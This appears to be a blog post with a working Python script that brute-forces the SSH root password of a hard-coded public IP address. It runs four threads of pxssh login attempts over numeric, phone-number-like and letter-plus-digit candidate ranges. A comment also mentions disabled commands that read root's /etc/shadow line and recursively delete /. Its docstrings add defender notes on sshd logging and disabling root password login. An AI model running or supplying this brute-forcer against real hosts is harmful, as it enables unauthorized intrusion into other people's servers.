pexpect模块获取root密码

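利用pexpect模块的pxssh发起SSH登录，逐个尝试候选密码来猜测root密码（在线口令猜测）。每次尝试都是一次完整的SSH密码认证，失败的尝试通常会记录在目标主机的sshd认证日志中；在sshd_config中禁止root使用密码登录（PermitRootLogin、PasswordAuthentication）并限制连续失败次数，可以使这类猜测失效。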

from pexpect import pxssh
from threading import Thread
from itertools import count
def send_command(s, cmd):
    """Run *cmd* on an open pxssh session and print what it produced.

    Args:
        s: A logged-in ``pxssh`` session (anything offering ``sendline``,
            ``prompt`` and a bytes ``before`` attribute works).
        cmd: The command line to send to the remote shell.
    """
    s.sendline(cmd)
    # Wait for the next shell prompt so that ``before`` holds the output.
    s.prompt()
    output = s.before.decode()
    print(output)

def connect_1(host, user, passwd_iter_1):
    """Try successive values from *passwd_iter_1* as SSH passwords.

    Every value drawn from the iterator is used for one pxssh password
    login as *user* on *host*. An attempt that raises is printed with a
    ``[-]`` prefix and the loop moves on to the next value. The loop gives
    up as soon as a drawn value is nine characters long when written out.

    Returns:
        The logged-in ``pxssh`` session after the first successful login,
        or ``None`` once the nine-character cutoff is reached.

    Defender's view: this is online password guessing, one SSH
    authentication per candidate, so sshd on the target normally records a
    failed password for every miss. Refusing password logins for root
    (``PermitRootLogin`` / ``PasswordAuthentication`` in sshd_config) and
    throttling repeated failures defeat it.
    """
    while True:
        candidate = next(passwd_iter_1)
        if len(str(candidate)) == 9:
            return None
        try:
            session = pxssh.pxssh()
            session.login(host, user, candidate)
        except:
            # Bare except kept from the original: every exception is
            # reported as a failed attempt.
            print('[-]', candidate)
            continue
        return session


def connect_2(host, user, passwd_iter_2):
    """Try successive values from *passwd_iter_2* as SSH passwords.

    Same loop as the other ``connect_*`` workers, but it stops when the
    drawn value equals 18700000000 instead of at a length cutoff.

    Returns:
        The logged-in ``pxssh`` session after the first successful login,
        or ``None`` when the stop value is drawn.

    NOTE(review): the stop value is an 11-digit number; presumably the
    iterator walks a block of phone-number-like values. Confirm against
    the caller.

    Defender's view: numeric passwords derived from something like a phone
    number fall inside a small, enumerable range. Each miss is a separate
    failed SSH password authentication that sshd normally logs; key-only
    authentication for root removes the exposure.
    """
    while True:
        candidate = next(passwd_iter_2)
        if candidate == 18700000000:
            return None
        try:
            session = pxssh.pxssh()
            session.login(host, user, candidate)
        except:
            # Bare except kept from the original: every exception is
            # reported as a failed attempt.
            print('[-]', candidate)
            continue
        return session

def connect_3(host, user, passwd_iter_3):
    """Try letter-plus-number candidates as SSH passwords.

    A candidate is a lowercase ASCII letter (code points 97-122) followed
    by the decimal form of the next value from *passwd_iter_3*. Each one
    is used for one pxssh password login as *user* on *host*; an attempt
    that raises is printed with a ``[-]`` prefix. The length cutoff is a
    plain ``return``, so the function ends the first time a drawn value is
    ten characters long.

    Returns:
        The logged-in ``pxssh`` session after the first successful login,
        or ``None`` once the ten-character cutoff is reached.

    Defender's view: a single letter in front of a run of digits adds very
    little to the search space. Every miss is a failed SSH password
    authentication that sshd normally logs, so a long run of failures for
    one account from one source is the signal to alert on.
    """
    for prefix in map(chr, range(97, 123)):
        # Same iterator object on every pass; it is not restarted.
        numbers = passwd_iter_3
        while True:
            number = next(numbers)
            if len(str(number)) == 10:
                return None
            candidate = prefix + str(number)
            try:
                session = pxssh.pxssh()
                session.login(host, user, candidate)
            except:
                # Bare except kept from the original: every exception is
                # reported as a failed attempt.
                print('[-]', candidate)
                continue
            return session

def connect_4(host, user, passwd_iter_4):
    """Try successive values from *passwd_iter_4* as SSH passwords.

    Every value drawn from the iterator is used for one pxssh password
    login as *user* on *host*. An attempt that raises is printed with a
    ``[-]`` prefix and the loop moves on. The loop gives up as soon as a
    drawn value is seven characters long when written out.

    Returns:
        The logged-in ``pxssh`` session after the first successful login,
        or ``None`` once the seven-character cutoff is reached.

    Defender's view: short all-digit passwords are covered by a loop like
    this in a bounded number of attempts. Limiting authentication failures
    per connection and per source address, and not accepting passwords for
    root at all, are the controls that matter here.
    """
    while True:
        candidate = next(passwd_iter_4)
        if len(str(candidate)) == 7:
            return None
        try:
            session = pxssh.pxssh()
            session.login(host, user, candidate)
        except:
            # Bare except kept from the original: every exception is
            # reported as a failed attempt.
            print('[-]', candidate)
            continue
        return session
def main():
    """Start the four guessing workers against one host and wait for them.

    Each worker gets the same hard-coded host, the user name ``root`` and
    its own ``itertools.count`` iterator starting at a different number.
    All four threads are started before any is joined.

    Defender's view: the result is four concurrent streams of SSH password
    attempts for root from a single source, a pattern that per-source
    failure counting on the SSH service picks up quickly.
    """
    host = "39.104.137.182"
    # The original listing also carried three disabled lines here: a
    # single-connection call and two send_command calls (one reading root's
    # line from /etc/shadow, one recursive delete of /). None of them runs.
    plan = (
        (connect_1, count(10000000)),
        (connect_2, count(18600000000)),
        (connect_3, count(100000000)),
        (connect_4, count(100000)),
    )
    workers = [
        Thread(target=worker, args=(host, "root", candidates))
        for worker, candidates in plan
    ]
    for thread in workers:
        thread.start()
    for thread in workers:
        thread.join()

# Start the worker threads only when the file is run as a script, not when
# it is imported.
if __name__ == '__main__':
    main()

 
